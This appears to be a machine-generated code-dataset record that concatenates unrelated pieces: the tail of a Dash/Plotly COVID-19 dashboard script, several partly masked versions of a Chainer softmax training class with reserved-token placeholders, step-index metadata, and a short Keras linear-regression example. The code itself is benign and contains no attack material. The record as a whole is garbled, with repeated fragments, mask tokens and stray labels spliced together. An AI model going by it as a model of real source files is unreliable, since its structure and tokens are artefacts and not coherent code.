'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False}, height=750, hovermode='closest')\r\n\r\n fig_global={'data':figscat, 'layout': layout_global}\r\n return fig_global\r\n\r\n\r\n@app.callback(\r\n [Output(component_id='main-dropdown-2', component_property = 'options'),\r\n Output(component_id='btext1', component_property='children'),\r\n Output(component_id='subplot1', component_property = 'figure'),\r\n Output(component_id='btext2', component_property='children'),\r\n Output(component_id='subplot2', component_property = 'figure'),\r\n Output(component_id='btext3', component_property='children'),\r\n Output(component_id='subplot3', component_property = 'figure')],\r\n [Input(component_id='main-dropdown', component_property = 'value')])\r\n\r\ndef update_country(selected_country):\r\n\r\n if selected_country is None:\r\n selected_country = 'Canada'\r\n\r\n options = ['Confirmed','Recovered','Deaths', 'Total and Daily 
Confirmed Cases']\r\n\r\n vals = [{'label': i, 'value': i} for i in options]\r\n\r\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#648FFF', width = 3))]\r\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Confirmed Cases: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width = 3))]\r\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, 
orientation='h'))\r\n\r\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#009E73', width = 3))]\r\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n return vals,final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'],{'data':trace_1, 'layout': layout_t1},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'],{'data':trace_2, 'layout':layout_t2},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Recovered_Diff'],{'data':trace_3, 'layout':layout_t3}\r\n \r\n\r\n else:\r\n options = ['Confirmed','Recovered','Deaths', 'Total and Daily Confirmed Cases']\r\n\r\n vals = [{'label': i, 'value': i} for i in options]\r\n\r\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x = 
final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#648FFF', width = 3))]\r\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Confirmed Cases: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width = 3))]\r\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6),\r\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[(final_df['Country_Region'] == 
selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#009E73', width = 3))]\r\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\r\n xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h'))\r\n\r\n return vals,final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'],{'data':trace_1, 'layout': layout_t1},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'],{'data':trace_2, 'layout':layout_t2},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Recovered_Diff'],{'data':trace_3, 'layout':layout_t3}\r\n\r\n\r\n\r\n@app.callback(\r\n Output(component_id='box-1',component_property='figure'),\r\n [Input(component_id='main-dropdown', component_property = 'value'),\r\n Input(component_id='main-dropdown-2', component_property = 'value')])\r\n\r\ndef update_maingraph(selected_country, selected_graph):\r\n if selected_graph is None and selected_country is None:\r\n\r\n selected_country = 'Canada'\r\n\r\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], marker_color='#648FFF')]\r\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 
'linecolor':'black'},\r\n title='Overall Progression of COVID-19: {0}'.format(str(selected_country)),\r\n hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black'))\r\n\r\n return {'data':figmain_t, 'layout': figmain_l}\r\n\r\n elif selected_graph is None and selected_country is not None:\r\n\r\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], marker_color='#648FFF')]\r\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Overall Progression of COVID-19: {0}'.format(str(selected_country)),\r\n hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black'))\r\n\r\n return {'data':figmain_t, 'layout': figmain_l}\r\n\r\n elif selected_graph == 'Total and Daily Confirmed Cases':\r\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], line=dict(color='#1A85FF', width = 1.5), mode='lines'),\r\n go.Scatter(name='Daily Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'], line=dict(color='#D41159', width = 3), mode='lines', fill='tozeroy')]\r\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 
'linecolor':'black'},\r\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(selected_country), str(selected_graph)),\r\n hovermode='x unified', xaxis=dict(title='Date',fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black'))\r\n\r\n return {'data':figmain_t, 'layout': figmain_l}\r\n\r\n else:\r\n cols_dict = {'Confirmed':'#648FFF', 'Deaths':'#DC267F', 'Recovered':'#009E73'}\r\n\r\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,selected_graph], marker_color=cols_dict[selected_graph])]\r\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,selected_graph].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'},\r\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(selected_country), str(selected_graph)),\r\n hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black'))\r\n\r\n return {'data':figmain_t, 'layout': figmain_l}\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server()", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
<|reserved_special_token_0|> class SoftMaxTrainer: def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat= False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == 'Adam': opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out= out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class SoftMaxTrainer: def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, 
repeat= False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == 'Adam': opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out= out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) def start(self): self.trainer.run() <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class SoftMaxTrainer: def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat= False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == 'Adam': opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, 
(n_epoch, 'epoch'), out= out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) def start(self): self.trainer.run() def predict(self, x): pred = F.softmax(self.model.predictor(x, train=False)) return pred.data <|reserved_special_token_1|> import chainer.links as L import chainer.functions as F from chainer import optimizer, optimizers, training, iterators from chainer.training import extensions from chainer.datasets import tuple_dataset class SoftMaxTrainer: def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat= False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == 'Adam': opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out= out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) 
self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) def start(self): self.trainer.run() def predict(self, x): pred = F.softmax(self.model.predictor(x, train=False)) return pred.data <|reserved_special_token_1|> # -*- coding: utf-8 -*- import chainer.links as L import chainer.functions as F from chainer import optimizer, optimizers, training, iterators from chainer.training import extensions from chainer.datasets import tuple_dataset class SoftMaxTrainer(): def __init__(self, net): self.model = L.Classifier(net) def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch): train = tuple_dataset.TupleDataset(train_x, train_t) test = tuple_dataset.TupleDataset(valid_x, valid_t) self.train_iter = iterators.SerialIterator(train, n_batch) self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False) def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None): if opt_name == "Adam": opt = getattr(optimizers, opt_name)() else: opt = getattr(optimizers, opt_name)(lr) opt.setup(self.model) opt.add_hook(optimizer.GradientClipping(g_clip)) updater = training.StandardUpdater(self.train_iter, opt, device=gpu) self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir) self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu)) self.trainer.extend(extensions.dump_graph('main/loss')) self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch')) 
self.trainer.extend(extensions.LogReport()) self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'], 'epoch', file_name='loss.png')) self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'], 'epoch', file_name='accuracy.png')) self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss', 'main/accuracy', 'validation/main/accuracy', 'elapsed_time'])) self.trainer.extend(extensions.ProgressBar()) def start(self): self.trainer.run() def predict(self, x): pred = F.softmax(self.model.predictor(x, train=False)) return pred.data
flexible
{ "blob_id": "474700968e563d34d6a0296ec62950e2e71fe1b0", "index": 1671, "step-1": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n 
self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n <mask token>\n", "step-3": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n 
opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n", "step-4": "import chainer.links as L\nimport chainer.functions as F\nfrom chainer import optimizer, optimizers, training, iterators\nfrom chainer.training import extensions\nfrom chainer.datasets import tuple_dataset\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n 
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n", "step-5": "# -*- coding: utf-8 -*-\n\nimport chainer.links as L\nimport chainer.functions as F\nfrom chainer import optimizer, optimizers, training, iterators\nfrom chainer.training import extensions\nfrom chainer.datasets import tuple_dataset\n\nclass SoftMaxTrainer():\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == \"Adam\":\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n\n updater = 
training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'],\n 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'],\n 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss',\n 'main/accuracy', 'validation/main/accuracy',\n 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
# Exercise 1 - linear.py import numpy as np import keras # Build the model model = keras.Sequential([keras.layers.Dense(units=1,input_shape=[1])]) # Set the loss and optimizer function model.compile(optimizer='sgd', loss='mean_squared_error') # Initialize input data xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float) ys = np.array([-2.0, 1.0, 4.0, 7.0, 10.0, 13.0], dtype=float) # Fit the model model.fit(xs, ys, epochs=500) # Prediction dataIn = np.array([10.0], dtype=float) print(model.predict(dataIn,1,1))
normal
